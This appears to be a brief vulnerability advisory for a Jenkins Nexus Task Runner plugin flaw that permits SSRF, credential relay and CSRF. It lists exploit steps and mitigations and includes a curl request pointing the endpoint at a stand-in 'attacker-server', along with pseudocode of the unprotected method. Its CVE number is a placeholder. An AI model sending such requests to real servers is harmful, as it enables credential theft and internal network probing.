Listen to this Post
The CVE-2025-XXXXX vulnerability exists within the Jenkins Nexus Task Runner Plugin. The plugin provides an HTTP endpoint that lacks any form of permission check. Normally, sensitive endpoints should verify that the user has appropriate credentials, such as the Overall/Administer permission. However, this specific endpoint does not perform such a validation. Consequently, any attacker who has the Overall/Read permission, a relatively low-privilege access level, can interact with this endpoint. The endpoint’s function is to connect to a specified URL using provided credentials. The flaw allows an attacker to supply a URL under their control along with any username and password, forcing the Jenkins server to send a request to an arbitrary external system. This can be exploited for Server-Side Request Forgery (SSRF) and to potentially relay credentials. Furthermore, the endpoint is accessible via GET requests, making it vulnerable to Cross-Site Request Forgery (CSRF), where a logged-in user could be tricked into triggering the action by visiting a malicious website.
Platform: Jenkins Plugin
Version: <= 0.9.2
Vulnerability : Missing Authorization
Severity: Moderate
date: 2024-10-29
Prediction: 2024-11-19
What Undercode Say:
curl -X GET 'http://jenkins-host:8080/jenkins/plugin/nexus-task-runner/endpoint?url=http://attacker-server&username=foo&password=bar'
// Pseudocode of vulnerable endpoint
@WebMethod
public void doConnect(@QueryParameter("url") String url, @QueryParameter("username") String user, @QueryParameter("password") String pass) {
// MISSING: Permission check like checkPermission(AdministerPermission)
HttpClient.makeRequest(url, user, pass); // SSRF & Credential Relay
}
How Exploit:
1. Attacker with Overall/Read permission authenticates to Jenkins.
- Attacker crafts a request to the vulnerable endpoint, specifying an external server and credentials.
- Jenkins server sends the HTTP request, revealing internal network information or relaying credentials to the attacker.
- Alternatively, an attacker creates a malicious site that sends a GET request to the endpoint, exploiting a logged-in admin via CSRF.
Protection from this CVE
Upgrade plugin when patch is released.
Temporarily remove plugin.
Restrict user permissions.
Implement network segmentation.
Impact:
SSRF, Credential Relay, CSRF.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

